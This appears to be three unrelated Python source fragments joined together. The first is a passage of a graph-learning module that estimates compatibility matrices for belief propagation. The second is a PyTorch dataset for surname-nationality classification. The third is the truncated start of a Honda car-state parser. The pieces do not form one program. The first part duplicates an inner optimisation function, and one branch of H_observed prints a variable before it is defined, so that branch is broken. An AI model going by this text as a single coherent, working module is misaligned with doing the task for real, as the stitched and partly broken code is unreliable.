alpha=alpha, beta=beta, gamma=gamma,
X=X2)
eps = s * eps_max
F, actualIt, actualPercentageConverged = \
linBP_symmetric_parameterized(X_train, W, H*eps,
method='noecho',
alpha=alpha, beta=beta, gamma=gamma,
numMaxIt=numMax,
convergencePercentage=0.99,
convergenceThreshold=0.99,
debug=2)
n, k = F.shape
for i in range(n):
if i not in test_ind:
F[i] = np.zeros(k)
accuracy_X = matrix_difference(X_test, F, ignore_rows=list(train_ind), similarity='accuracy')
print("Holdout accuracy: {}".format(accuracy_X))
return_output.put(accuracy_X) ## For Parallel
# return accuracy_X ## For Non Parallel
def optimize_once(h0, energy_h):
if constraints:
bnds = [(0, 1) for _ in range(k_star)]
result = optimize.minimize(fun=energy_h, x0=h0, method='L-BFGS-B', bounds=bnds) # 'L-BFGS-B'
else:
# bnds = [(0, 1) for _ in range(k_star)]
# result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP', bounds=bnds) # 'SLSQP' 'BFGS'
# result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP') # 'SLSQP' 'BFGS'
result = optimize.minimize(fun=energy_h, x0=h0, method='Nelder-Mead') # for non continuous
h = result.get('x')
E = result.get('fun')
return h, E
h0 = np.ones(k_star).dot(1 / k) # use uninformative matrix to start with
if not randomize and initial_H0 is None:
h, _ = optimize_once(h0, energy_h)
elif initial_H0 is not None: # use supplied vector to start with
E_dic = {} # dictionary of Energy functions
for h0 in initial_H0:
h, fun = optimize_once(h0, energy_h)
E_dic[fun] = h
E_min = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[E_min] # then look up the corresponding h vector
# If randomize: then initiate the optimization with slightly permuated initial vectors (around default h0 value). Then pick the best one
else:
delta = 0.1
permutations = list(itertools.product([-delta, delta], repeat=k_star)) # permutation for default value
E_dic = {} # dictionary of Energy functions
for lst in permutations:
h1 = h0 + np.array(lst)
h, fun = optimize_once(h1, energy_h)
E_dic[fun] = h
E_min = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[E_min] # then look up the corresponding h vector
# final return statement
return transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
def estimateH_baseline_serial(X2, ind, W, numberOfSplits=4, numMax=20,
EC=False,
randomize=False,
weights=None,
initial_H0=None, constraints=False,
alpha=0., beta=0., gamma=1., doubly_stochastic=True):
"""Estimation of H, using train-test methods and minimizing the aggregated accuracies over several splits.
Splits the labeled set into half test / half train. Does this numberOfSplits times.
Needs all the parameters required for propagation.
TODO: why does it need EC, weights, etc? Given it is a different function
TODO: explain here some details of the parameters. E.g. does it split into two equally sized sets (seems to be implied by code below)
Parameters
----------
X2 : [n x k] np array
seed belief matrix
ind: indices of seed beliefs in matrix X2
W : [n x n] sparse.csr_matrix
sparse weighted adjacency matrix
numberOfSplits : int (Default=4)
how many splits for train-test evaluation, taking average accuracy over all splits
numMax : int (Default=20)
TODO: why is default==20, for experiments, did you use 10?
EC : TODO delete?
randomize: Boolean (Default = False)
If True, then permutes the initial h0 vector a few times for estimation, then picks the best one.
An attempt to deal with non-convexity
TODO: why is this needed here?
weights: TODO delete?
initial_H0: list of list of float (Default=None)
Option to specify a list of initial values for h0 from which to start the optimization when searching for best H
constraints: Boolean (Default = False)
True constrains all independent entries for H in [0, 1] (unfortunately does not constrain all entries in H)
alpha, beta, gamme: Float (Default = 0)
Optional normalization and clamping of propagation matrix
doubly_stochastic: True
Returns
-------
H : [k x k] np array
Symmetric compatibility matrix
"""
n, k = X2.shape
if doubly_stochastic:
k_star = k * (k - 1) // 2 # integer division, returns integer
else:
k_star = k * (k - 1)
indices = list(ind)
halfLen = int(len(indices) / 2) # for each numberOfSplits, splits the labeled data half into test/train sets TODO: is that correct
X_train_split = {}
X_test_split = {}
train_split_idx = {}
test_split_idx = {}
for iter in range(numberOfSplits):
shuffle(indices)
train_split_idx[iter] = indices[:halfLen] # indices of train set
test_split_idx[iter] = indices[halfLen:] # indices of test set
X_train_split[iter] = copy.deepcopy(X2)
for i in range(n):
if i not in train_split_idx[iter]:
X_train_split[iter][i] = np.zeros(k)
X_test_split[iter] = copy.deepcopy(X2)
for i in range(n):
if i not in test_split_idx[iter]:
X_test_split[iter][i] = np.zeros(k)
def energy_h(h):
"""energy function to minimize as the negative average accuracy over all splits"""
H = transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
all_acc = np.zeros(numberOfSplits)
for iter in range(numberOfSplits):
all_acc[iter] = calculate_accuracy(H, X_train_split.get(iter), X_test_split.get(iter), train_split_idx.get(iter), test_split_idx.get(iter), W, numMax)
return (-1 * np.average(all_acc))
def calculate_accuracy(H, X_train, X_test, train_ind, test_ind, W, s=0.5):
"""Propagates from X_train numMax times, calculates accuracy over X_test
"""
H0c = to_centering_beliefs(H)
eps_max = eps_convergence_linbp_parameterized(H0c, W, # TODO: an optimized version could attempt to calculate the spectral radius fewer times and re-use it for multiple splits
method='noecho',
alpha=alpha, beta=beta, gamma=gamma,
X=X2)
eps = s * eps_max
F, actualIt, actualPercentageConverged = linBP_symmetric_parameterized(X_train, W, H*eps,
method='noecho',
alpha=alpha, beta=beta, gamma=gamma,
numMaxIt=numMax,
convergencePercentage=0.99,
convergenceThreshold=0.99,
debug=2)
n, k = F.shape
for i in range(n):
if i not in test_ind:
F[i] = np.zeros(k)
# TODO For label imbalance, better to use CLASSWISE (macro-averaging) here
accuracy_X = matrix_difference(X_test, F, ignore_rows=list(train_ind), similarity='accuracy')
# print("accuracy now is {}".format(accuracy_X))
return accuracy_X
def optimize_once(h0, energy_h):
if constraints:
bnds = [(0, 1) for _ in range(k_star)]
result = optimize.minimize(fun=energy_h, x0=h0, method='L-BFGS-B', bounds=bnds) # 'L-BFGS-B'
else:
# bnds = [(0, 1) for _ in range(k_star)]
# result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP', bounds=bnds) # 'SLSQP' 'BFGS'
# result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP') # 'SLSQP' 'BFGS'
result = optimize.minimize(fun=energy_h, x0=h0, method='Nelder-Mead') # for non continuous optimization, other approaches don't work as well
h = result.get('x')
E = result.get('fun')
return h, E
h0 = np.ones(k_star).dot(1 / k) # use uninformative matrix to start with
if not randomize and initial_H0 is None:
h, _ = optimize_once(h0, energy_h)
elif initial_H0 is not None: # use supplied vector to start with
E_dic = {} # dictionary of Energy functions
for h0 in initial_H0:
h, fun = optimize_once(h0, energy_h)
E_dic[fun] = h
E_min = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[E_min] # then look up the corresponding h vector
# If randomize: then initiate the optimization with slightly permuated initial vectors (around default h0 value). Then pick the best one
else:
delta = 0.1
permutations = list(itertools.product([-delta, delta], repeat=k_star)) # permutation for default value
E_dic = {} # dictionary of Energy functions
for lst in permutations:
h1 = h0 + np.array(lst)
h, fun = optimize_once(h1, energy_h)
E_dic[fun] = h
E_min = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[E_min] # then look up the corresponding h vector
# final return statement
return transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
def transform_hToH(h_vector, k, doubly_stochastic=True):
"""Transforms a parameter vector for a k dimensional symmetric stochastic matrix into the matrix.
Allows the optimization problem to become unconstrained.
Used by the various estimation functions.
doubly_stochastic: Boolean
- k*(k-1)/2 parameters if True (creates a doubly stochastic matrix)
- k*(k-1) parameters if False (creates a row stochastic matrix)
H(1,1) * * *
H(2,1) H(2,2) * *
H(3,1) H(3.2) H(3,3) *
* * * *
h(0) * * *
h(1) h(3) * *
h(2) h(4) h(5) *
* * * *
"""
if np.isnan(h_vector).any() or (np.abs(h_vector) > 10e10).any():
print("Problem in 'transform_hToH' input:", h_vector)
if k == 3 and doubly_stochastic: # slight speed-up
return np.array([[h_vector[0], h_vector[1], 1 - h_vector[0] - h_vector[1]],
[h_vector[1], h_vector[2], 1 - h_vector[1] - h_vector[2]],
[1 - h_vector[0] - h_vector[1], 1 - h_vector[1] - h_vector[2], h_vector[0] + 2 * h_vector[1] + h_vector[2] - 1]])
elif doubly_stochastic:
assert len(h_vector) == k*(k-1)//2
H = np.zeros((k, k))
for j in range(0, k-1):
s = int((k - (1+j)/2)*j) # starting index for column
for i in range(0, j):
H[i, j] = H[j, i]
for i in range(j, k-1):
H[i, j] = h_vector[s+i-j]
for j in range(0, k-1):
H[k-1, j] = 1 - H[:, j].sum()
H[j, k-1] = H[k-1,j]
H[k-1, k-1] = 1 - H[:, k-1].sum()
else:
assert len(h_vector) == k*(k-1)
H = np.zeros((k, k))
for i in range(0, k-1):
H[:,i] = h_vector[i*k:i*k+k]
H[:, k-1] = list(map(lambda r: 1-sum(r), H))
return H
def transform_HToh(H0, k=None, doubly_stochastic=True):
"""Extracts the k* free parameters from a k*k dimensional row stochastic matrix
"""
_, k = H0.shape
h0_vec = list()
if doubly_stochastic:
for j in range(k-1):
for i in np.arange(j, k-1):
h0_vec.append(H0[i][j])
else:
for i in range(k-1):
h0_vec.append(H0[:, i])
return h0_vec
def define_gradient_energy_H(H_vec_observed, weights=None, distance=1):
"""Returns the gradient for the energy function 'gradient_energy_H(H)' that is constructed from H_vec_observed.
Input: All observed H_vec_observed, the weight vector and maximal distance
"""
length = min(len(H_vec_observed), distance)
if weights is None:
weights = np.ones(length)
assert len(weights) >= distance
def gradient_energy_H(H):
S = 0
for i in range(length):
i2 = i+1 # 1 indexing
M = H_vec_observed[i] # 0 indexing
Si = i2 * LA.matrix_power(H, 2*i2-1) # 1 indexing
for j in range(i2):
Si -= matrix_power(H, j).dot(M).dot(matrix_power(H, i2-j-1)) # 1 indexing Also requires wrapper that makes sure that H^0 = I
S += weights[i] * Si # 0 indexing
return 2*S
return gradient_energy_H
def matrix_power(M, j):
"""H^0 of matrices with 0s on diagonal don't return the identify matrix.
But that's needed in define_gradient_energy_H. Thus this wrapper function"""
if j == 0:
return np.identity(M.shape[0])
else:
return LA.matrix_power(M, j)
def derivative_H_to_h(H, doubly_stochastic=True):
"""Calculates the partial derivative of a kxk doubly stochastic matrix with regard to the k(k-1)/2 free parameters
TODO: don't remember if the else is correct for row-stochastic values
"""
(_, k) = H.shape
h0_vec = list()
if doubly_stochastic:
for j in range(k-1):
for i in np.arange(j, k-1):
if i == j:
value = H[i][j] - H[i][-1] - H[-1][j] + H[-1][-1]
h0_vec.append(value)
else:
value = H[i][j] + H[j][i] - H[i][-1] - H[-1][j] - H[j][-1] - H[-1][i] + 2 * H[-1][-1]
h0_vec.append(value)
return np.array(h0_vec)
else:
for i in range(k):
for j in np.arange(0, k-1):
if i == j:
value = H[i][j] - H[i][-1] - H[-1][j] + H[-1][-1]
h0_vec.append(value)
else:
value = H[i][j] + H[j][i] - H[i][-1] - H[-1][j] - H[j][-1] - H[-1][i] + 2 * H[-1][-1]
h0_vec.append(value)
return np.array(h0_vec)
def calculate_H_entry(i, j, k):
"""Returns the index of the free parameter for entry (i ,j) of a symmetric doubly stochastic matrix.
Not applicable to last row and last column
"""
assert i < k-1 and j < k-1, "unique index of the free parameters only exists for entries except last row or column"
if i < j:
return calculate_H_entry(j, i, k)
else:
return int(i+j*(k-1.5-j/2))
# def check_Diagonal(j, k):
# """determines whether the jth free parameter in a kxk symmetric doubly stochastic matrix is at the diagonal or not
# """
# if i < j:
# return calculate_H_entry(j, i, k)
# else:
# return int(i+j*(k-1.5-j/2))
def create_constraints(k, doubly_stochastic=True):
"""Create constraints for the k^* vector, i.e. the free parameters for a k x k dimensional stochastic matrix.
Epsilon away from the actual borer used, because the optimization did not obey the constraints exactly
"""
epsilon = 0.00001
if doubly_stochastic:
if k == 3:
cons = (
{'type': 'ineq', 'fun': lambda x: x[0] - epsilon},
{'type': 'ineq', 'fun': lambda x: x[1] - epsilon},
{'type': 'ineq', 'fun': lambda x: x[2] - epsilon},
{'type': 'ineq', 'fun': lambda x: 1 - x[0] - x[1] - epsilon},
{'type': 'ineq', 'fun': lambda x: 1 - x[1] - x[2] - epsilon},
{'type': 'ineq', 'fun': lambda x: x[0] + 2 * x[1] + x[2] - 1 - epsilon})
else:
k_star = k*(k-1)//2
constraint = '('
for i in range(k_star): # 1. constraints for all free parameters
constraint += "{{'type': 'ineq', 'fun': lambda x: x[{0}] - {1} }},\n".format(i, epsilon)
for j in range(k-1): # 2. constraints for last row, except last cell
s = '{} '.format(1-epsilon)
for i in range(k-1):
s += ' - x[{}] '.format(calculate_H_entry(i, j, k))
constraint += "{{'type': 'ineq', 'fun': lambda x: {} }},\n".format(s)
s = '{} '.format(2-k-epsilon) # 3. constraint for last cell
for i in range(k-1):
for j in range(k - 1):
s += ' + x[{}] '.format(calculate_H_entry(i, j, k))
constraint += "{{'type': 'ineq', 'fun': lambda x: {} }})".format(s)
# print("\n\n{}".format(constraint))
cons = eval(constraint)
else:
k_star = k*(k-1)
constraint = '('
for i in range(k_star): # 1. constraints for all free parameters
constraint += "{{'type': 'ineq', 'fun': lambda x: x[{0}] - {1} }},\n".format(i, epsilon)
for i in range(k): # 2. constraints for last column
s = '{} '.format(1-epsilon)
for j in range(k-1):
s += ' - x[{}] '.format(j)
constraint += "{{'type': 'ineq', 'fun': lambda x: {} }},\n".format(s)
constraint += ")"
cons = eval(constraint)
return cons
def estimateH(X, W, method='DHE',
weights=None, distance=1, EC=True, variant=1,
randomize=False, delta=0.1,
randomrestarts=None,
initial_H0=None,
initial_h0=None,
constraints=False,
alpha=0, beta=0,
logarithm=False,
gradient=False,
verbose=False,
doubly_stochastic=True,
initial_permutationFlag=False,
initial_permutation=None,
returnExtraStats = False,
return_min_energy=False,
increamentalRandomRestartsFlag=False,
increamentalRandomRestarts = None,
):
"""Estimation of symmetric stochastic H, with various methods
Parameters
----------
X : [n x k] np array
seed belief matrix
W : [n x n] sparse.csr_matrix
sparse weighted adjacency matrix
method: string
choices
'MHE': Myopic Heterophily Estimation, new name: MCE
'DHE': Distant Heterophily Estimation, new name: DCE
'LHE': Linear Heterophily Estimation, new name: LCE
('LHEregular': Summation formula like in standard regularization framework (very slow)... not supported anymore)
('LHE2': with echo ... not supported anymore)
weights: list(Default = None)
List of weights of various pathlength. w[0] is weight of neighbors (path length = 1), etc.
Alternatively, just a single number that gets transformed into an array later
distance: int (Default = 1)
maximal distance (path length) that is included for estimations (except for MHE)
EC: Boolean (Default = True)
For method DHE: If True: Calculates the neighbors in distance d while ignoring back-tracking paths
TODO: rename to NB for non-backtracking paths
variant: int (Default = 1)
For method MHE for H_observed: variant 1: row-normalized. (2: symmetric normalized. 3: symmetric scaled)
randomize: Boolean (Default = False)
If True, then permutes the initial h0 vector a few times for estimation, then picks the best one.
2^k_star initial vectors (each one slightly permutes the intial values aroun the default uninformative value)
Approach to deal with non-convexity for longer paths
delta: Float (Default = 0.1)
Optional parameter that determines the starting point for random initial points
randomrestarts: int (Default = None)
allows to use fixed number of restarts which are randomly sampled from the randomize approach
initial_H0: value of H0 to initialize with (used to be a vector, now a k times k matrix)
Option to specify a initial H0 to start the optimization
initial_h0: value of doubly stochastic parameterized h0 to initialize with (originally used to be a vector, this parameter restores this option)
Option to specify a initial H0 to start the optimization
H0 has precedence over h0
constraints: Boolean (Default = False)
True constrains all independent entries for H in [0, 1] (unfortunately does not constrain all entries in H)
TODO: Constraints are not working correctly. It seems, minimize enforces constraints as soft with a penalty function. And that screws up something
alpha, beta: Float (Default = 0)
Optional normalization of propagation matrix
logarithm: Boolean (Default = False)
True transforms the energy function with logarithm before optimizing
TODO: remove
gradient: Boolean (Default = False)
True uses the gradiant calculation to speed up calculation for MHE and DHE
verbose: Boolean (Default = False)
prints extra infos: vector being optimized, resultant vector, minimum energy
doubly_stochastic: Boolean (Default = True)
False to estimate a row stochastic matrix with k(k-1) parameters instead of k(k-1)/2.
Do not modify this variable unless the graph has significant skew towards certain classes over others
initial_permutationFlag: Boolean (Default = False)
True if DCEr is supplied with a list of initial restart vectors
initial_permutation: [] (Default = None)
list of initial random restarts, each restart is a vector of k_star variables
returnExtraStats: Boolean (Default = False)
flag to return time and number of iterations taken by optimizer
return_min_energy: Boolean (Default = False)
If True, returns the optimal h vector and fun (instead of just the H matrix)
increamentalRandomRestartsFlag # TODO remove, poorly done, could be just one variable with flag and default as None
increamentalRandomRestarts = use the supplied restart points # also still adds additional permutations to it?
Returns
-------
H : [k x k] np array
Symmetric compatibility matrix
Notes
-----
Retrieves an energy function from 'define_energy_H', and then uses a common minimization routine
with a trick to optimize over k(k-1)/2 independent entries of H function
"""
_, k = X.shape
end = " " # time initializer, TODO remove
k_star = k * (k - 1)
if doubly_stochastic:
k_star = k_star // 2 # integer division, returns integer. Example: has 3 parameters for 3x3 H matrix
if weights is None:
weights = np.ones(distance)
elif isinstance(weights, Number): # allow scalar to be passed as argument
weights = np.array([np.power(weights, i) for i in range(distance)])
assert len(weights) >= distance
if initial_H0 is not None:
initial_H0 = np.atleast_2d(initial_H0) # requires 2d array
h0 = transform_HToh(initial_H0, k, doubly_stochastic=doubly_stochastic)
elif initial_h0 is None:
h0 = np.ones(k_star).dot(1 / k) # use uninformative matrix to start with
else:
h0 = initial_h0
H_vec_observed = H_observed(W, X, distance=distance, NB=EC, variant=variant) # get normalized path statistics P_hat
energy_H = define_energy_H(W=W, X=X, method=method, weights=weights, alpha=alpha, # TODO: remove W X as input later once alpha and beta not used anymore
beta=beta, distance=distance, EC=EC, variant=variant,
H_vec_observed=H_vec_observed)
def energy_h(h):
"""changes parameters for energy function from matrix H to free parameters in array"""
H = transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
if not logarithm: # TODO: remove logarithm if not used anymore
return energy_H(H)
else:
return np.log(energy_H(H))
if gradient:
if method not in ['DHE', 'MHE']:
warnings.warn("\nGradient only defined for DCE")
gradient_energy_H = define_gradient_energy_H(H_vec_observed=H_vec_observed, weights=weights, distance=distance)
def gradient_energy_h(h):
"""changes parameters for gradient from matrix H to free parameters in array"""
H = transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
g = gradient_energy_H(H)
if np.isnan(g).any(): # TODO obsolete, delete
print("Gradient with nan:")
print(g)
print("Original H:")
print(H)
print("Original h:")
print(h)
print("H_vec observed:")
print(H_vec_observed)
h = derivative_H_to_h(g, doubly_stochastic=doubly_stochastic)
return h
PRINTINTERMEDIATE = False # option to print intermediate results from optimizer (for debugging)
global Nfeval, permutations
Nfeval = 1
def callbackfct(x): # print intermediate results, commented out in non-gradient loops below
global Nfeval
if PRINTINTERMEDIATE:
np.set_printoptions(precision=4)
print('{0:4d} {2} {1} '.format(Nfeval, energy_h(x), x))
print('Iter: {}'.format(Nfeval))
Nfeval += 1
bnds = [(0,1) for i in range(k_star)] # optional bounds for variables to be used in optimization function
if constraints:
cons = create_constraints(k)
def optimize_once(h0, energy_h):
"""actual optimization step that can be repeated multiple times from random starting point"""
if gradient:
# using gradients:
# BFGS: slightly slower than SLSQP, but converges better (can escape from weak saddle points), even finds optimum from some wrong points
# SLSQP: slightly faster than BFGS, but gets more likely stuck in saddle points
# L-BFGS-B: no seemingly advantage. Cannot deal with constraints although specifed
# CG: considerably slower :(
# Newton-CG: considerably slower :(
if constraints: # TODO not yet tested
result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP',
constraints=cons,
jac=gradient_energy_h,
# bounds=bnds,
callback=callbackfct,
) # 'SLSQP' 'BFGS'
else:
result = optimize.minimize(fun=energy_h, x0=h0, method='BFGS',
jac = gradient_energy_h,
# bounds=bnds, # bounds make it perform worse. Problem of optimization implementation
callback = callbackfct,
) # 'SLSQP' 'BFGS'
# print('Iter: {}'.format(Nfeval))
h = result.get('x')
E = result.get('fun')
return h, E
else:
if constraints:
# TODO: constraints are not working correctly. Problem seems to be with actual method 'SLSQP': (1) ignoring the constraints
# TODO: and (2) even missing local optima it finds without those constraints ...
result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP',
constraints=cons,
# bounds=bnds,
callback=callbackfct,
) # 'SLSQP' 'BFGS'
else:
result = optimize.minimize(fun=energy_h, x0=h0, method='SLSQP',
# bounds=bnds, # bounds make it perform worse. Problem of optimization implementation
callback = callbackfct,
) # 'SLSQP' 'BFGS'
h = result.get('x')
E = result.get('fun')
return h, E
if not randomize: # use supplied vector uninformative vector to start with
start = time()
h, fun = optimize_once(h0, energy_h)
end = time() - start
if verbose:
print("Initial:{} Result:{} Energy:{}".format(np.round(h0, decimals=3), np.round(h, decimals=3), fun))
# print("DCE fun: {}".format(fun))
print("Time taken by energy optimize: {}".format(str(end)))
else:
if initial_permutationFlag: # TODO: allows explicit starting point. Cleaner to use without the flag
permutations = initial_permutation
else:
# If randomize: then initiate the optimization with slightly permuted initial vectors (around default h0 value).
# Then pick the best one result after optimization
# Original variant used in total 2^k_star initial vectors, each one for each of the "quadrants" around the default values:
# permutations = list(itertools.product([-delta, delta], repeat=k_star)) # permutation for default value
# TODO: This code part below is not done well. Also runs into coupon collector's problem.
# Problem it tried to solve is We cant hard code to 10 random restarts if none is specified
# Does not allow to specify the GT matrix as initial starting point, just to compare the ability of variant to recover it is local optimum
# TODO: old likely obsolete comment: "What happens when pruneRandom and Gradient is True for LCE and MCE"
if randomrestarts == None:
randomrestarts = k_star
if increamentalRandomRestartsFlag: # TODO: remove, as the code below adds to an initial permutation?
permutations = increamentalRandomRestarts
else:
permutations = []
while len(permutations) < randomrestarts:
perm = []
for _ in range(k_star):
perm.append(random.choice([-delta, delta]))
if perm not in permutations: # TODO: Coupon collector's problem, what happens if 10 specified, but only 8 quadrants?
permutations.append(perm)
# print("permutations length: {}, check: {}, {}".format(len(permutations), k*(k-1)/2, 2**(k*(k-1)/2)))
# print("JUST AFTER Perms ", permutations)
E_dic = {} # dictionary of Energy functions
for lst in permutations:
Nfeval = 1
h1 = h0 + np.array(lst)
h, fun = optimize_once(h1, energy_h)
E_dic[fun] = h # resolve ties randomly
if verbose:
print("Initial:{} Result:{} Energy:{}".format(h1, np.round(h,decimals=3), fun))
# print(" h0: {}".format(h1))
# print(" h: {}".format(h))
print(" fun: {}".format(fun))
fun = min(E_dic.keys()) # pick the minimum Energy
h = E_dic[fun] # then look up the corresponding h vector
# print("DCEr fun: {}".format(fun))
if returnExtraStats:
return transform_hToH(h, k, doubly_stochastic=doubly_stochastic), end, Nfeval #TODO:remove End, Nfeval
elif increamentalRandomRestarts:
return [transform_hToH(h, k, doubly_stochastic=doubly_stochastic), permutations] # TODO:remove End, Nfeval, permutations
elif return_min_energy:
return h, fun
else:
return transform_hToH(h, k, doubly_stochastic=doubly_stochastic)
def H_observed(W, X, distance, NB=True, variant=1):
"""Calculates a list [H1, H2, ..., Hd] with Hd being the row-normalized Markov matrix that is used for DHE
Parameters distance and NB are passed through to 'M_estimation'
Notice index starts at 1, in contrast to M_observed
variant == 1: row-stochastic
variant == 2: symmetric, normalized like LGC
variant == 3: divides by sum of matrix
SIGMOD 2020 refers to a 'two-step process' for estimating compatibilities.
This method can be thought of as step 1, or calculating the graph statistics P-hat
"""
n, n2 = W.shape
n3, k = X.shape
assert (n == n2) & (n == n3)
assert distance in range(1, 10)
assert variant in [1, 2, 3]
M_vec = M_observed(W, X, distance, NB=NB)
H_vec = []
for M in M_vec[1:]:
Mrowtot = M.dot(np.ones([k])) # row total for M. problem of "sum": returns integer data type (does not work with np.power)
Mrowtot[Mrowtot == 0] = 1 # don't normalize rows that have no entries
if variant == 1:
D_inv = np.diag(np.power(Mrowtot, -1)) # 'sparse.diags' does not work
H_vec.append(D_inv.dot(M))
elif variant == 2:
D_inv_red = np.diag(np.power(Mrowtot, -0.5))
H_vec.append((D_inv_red.dot(M)).dot(D_inv_red))
else: # variant == 3
if np.sum(M) == 0: # TODO
print("\ndivision by zero because M is \n{}\nfor\n{}".format(M, M_vec))
H_vec.append(M + 1/k)
print("normalizer is \n{}\nfor{}".format(normalizer, H_vec))
else:
normalizer = 1 / (np.sum(M) / k)
H_vec.append(M.dot(normalizer))
return H_vec
def M_observed(W, X, distance, NB=True):
"""Calculates a list [M0, M1, M2, ..., Md] with Md = X^T W^d X where d=distance
Optional with or without NB
Assumes W is symmetric
Intermediate result Nd = W^d X for memoization (then Md = X^T Nd)
Tip: Important trick for speed: never multiply W with W directly
Notice index starts at 0, in contrast to H_observed"""
n, n2 = W.shape
n3, k = X.shape
assert (n == n2) & (n == n3)
assert isinstance(distance, int) & (n >= 0)
N_vec = []
M_vec = []
N_vec.append(X)
M_vec.append(X.transpose().dot(N_vec[-1]))
if distance >= 1:
N_vec.append(W.dot(X))
M_vec.append(X.transpose().dot(N_vec[-1]))
if distance >= 2:
if not NB:
N_vec.append(W.dot(N_vec[-1]))
else:
D = sparse.diags(W.dot(np.ones(n, dtype=int)), 0, dtype=int)
D_I = D - sparse.diags(np.ones(n, dtype=int), 0, dtype=int)
N_vec.append(W.dot(N_vec[-1]) - D.dot(X))
M_vec.append(X.transpose().dot(N_vec[-1]))
for _ in range(3, distance+1):
if not NB:
N_vec.append(W.dot(N_vec[-1]))
else:
N_vec.append(W.dot(N_vec[-1]) - D_I.dot(N_vec[-2]))
M_vec.append(X.transpose().dot(N_vec[-1]))
return M_vec
|
#!/usr/bin/env python
import json
import torch
import pdb
import numpy as np
import pandas as pd
from torch.utils.data import Dataset
from .vectorizer import MLPVectorizer, CNNVectorizer
class PDataset(Dataset):
"""
DataSet derived from PyTorch's Dataset class
"""
def __init__(self, df: pd.DataFrame, vectorizer) -> None:
self.df = df
self.df_size = len(self.df)
self._vectorizer = vectorizer
@classmethod
def load_data_and_vectorizer(cls, df: pd.DataFrame, vectorizer_path: str):
"""
Load dataset and the corresponding vectorizer. Used in the case the
vectorizer has been cached for re-use
Args:
review_csv: path to the dataset
vectorizer_path: path to the saved vectorizer file
"""
vectorizer = cls.load_vectorizer(vectorizer_path)
return cls(df, vectorizer)
def save_vectorizer(self, vectorizer_path: str) -> None:
"""
Saves the vectorizer to disk using json
Args:
vectorizer_path: path toe save the vectorizer file
"""
with open(vectorizer_path, 'w') as f:
json.dump(self._vectorizer.to_serializeable(), f)
def get_vectorizer(self):
return self._vectorizer
def __len__(self) -> int:
return self.df_size
def get_num_batches(self, batch_size: int) -> int:
"""
Given a batch size, return the number of batches in the dataset
"""
return len(self) // batch_size
class CNNDataset(PDataset):
def __init__(self, df, vectorizer):
super(CNNDataset, self).__init__(df, vectorizer)
@staticmethod
def load_vectorizer(vectorizer_path: str) -> CNNVectorizer:
"""
A static method for loading the vectorizer from file
Args:
vectorizer_path: path to the saved vectorizer file
"""
with open(vectorizer_path) as f:
return CNNVectorizer.from_serializable(json.load(f))
@classmethod
def load_data_and_create_vectorizer(cls, df: pd.DataFrame):
"""
Load dataset and create a new Vectorizer object
Args:
review_csv: path to the dataset
Returns:
an instance of Vectorizer
"""
return cls(df, CNNVectorizer.from_dataframe(df))
def __getitem__(self, idx: int) -> tuple:
"""
The primary entry point method for PyTorch datasets
Args:
idx: the index to the data point
Returns:
a tuple holding the data point's features and label target
"""
row = self.df.iloc[idx]
surname_matrix = np.asarray(self._vectorizer.vectorize(row['surname']), dtype=np.float32)
nationality_idx = np.asarray(self._vectorizer.nationality_vocab.lookup_token(
row['nationality']), dtype=np.int64)
return (surname_matrix, nationality_idx)
class MLPDataset(PDataset):
def __init__(self, df, vectorizer):
super(MLPDataset, self).__init__(df, vectorizer)
@staticmethod
def load_vectorizer(vectorizer_path: str) -> MLPVectorizer:
"""
A static method for loading the vectorizer from file
Args:
vectorizer_path: path to the saved vectorizer file
"""
with open(vectorizer_path) as f:
return MLPVectorizer.from_serializable(json.load(f))
@classmethod
def load_data_and_create_vectorizer(cls, df: pd.DataFrame):
"""
Load dataset and create a new Vectorizer object
Args:
review_csv: path to the dataset
Returns:
an instance of Vectorizer
"""
return cls(df, MLPVectorizer.from_dataframe(df))
def __getitem__(self, idx: int) -> tuple:
"""
The primary entry point method for PyTorch datasets
Args:
idx: the index to the data point
Returns:
a tuple holding the data point's features and label target
"""
row = self.df.iloc[idx]
surname_vector = np.asarray(self._vectorizer.vectorize(row['surname']), dtype=np.float32)
nationality_idx = np.asarray(self._vectorizer.nationality_vocab.lookup_token(
row['nationality']), dtype=np.int64)
return (surname_vector, nationality_idx)
|
from cereal import car
from collections import defaultdict
from common.numpy_fast import interp
from common.kalman.simple_kalman import KF1D
from opendbc.can.can_define import CANDefine
from opendbc.can.parser import CANParser
from selfdrive.config import Conversions as CV
from selfdrive.car.honda.values import CAR, DBC, STEER_THRESHOLD, SPEED_FACTOR, HONDA_BOSCH
GearShifter = car.CarState.GearShifter
def parse_gear_shifter(gear, vals):
val_to_capnp = {'P': GearShifter.park, 'R': GearShifter.reverse, 'N': GearShifter.neutral,
'D': GearShifter.drive, 'S': GearShifter.sport, 'L': GearShifter.low}
try:
return val_to_capnp[vals[gear]]
except KeyError:
return "unknown"
def calc_cruise_offset(offset, speed):
# euristic formula so that speed is controlled to ~ 0.3m/s below pid_speed
# constraints to solve for _K0, _K1, _K2 are:
# - speed = 0m/s, out = -0.3
# - speed = 34m/s, offset = 20, out = -0.25
# - speed = 34m/s, offset = -2.5, out = -1.8
_K0 = -0.3
_K1 = -0.01879
_K2 = 0.01013
return min(_K0 + _K1 * speed + _K2 * speed * offset, 0.)
def get_can_signals(CP):
# this function generates lists for signal, messages and initial values
signals = [
("XMISSION_SPEED", "ENGINE_DATA", 0),
("WHEEL_SPEED_FL", "WHEEL_SPEEDS", 0),
("WHEEL_SPEED_FR", "WHEEL_SPEEDS", 0),
("WHEEL_SPEED_RL", "WHEEL_SPEEDS", 0),
("WHEEL_SPEED_RR", "WHEEL_SPEEDS", 0),
("STEER_ANGLE", "STEERING_SENSORS", 0),
("STEER_ANGLE_RATE", "STEERING_SENSORS", 0),
#("STEER_TORQUE_SENSOR", "STEER_STATUS", 0),
#("STEER_TORQUE_MOTOR", "STEER_STATUS", 0),
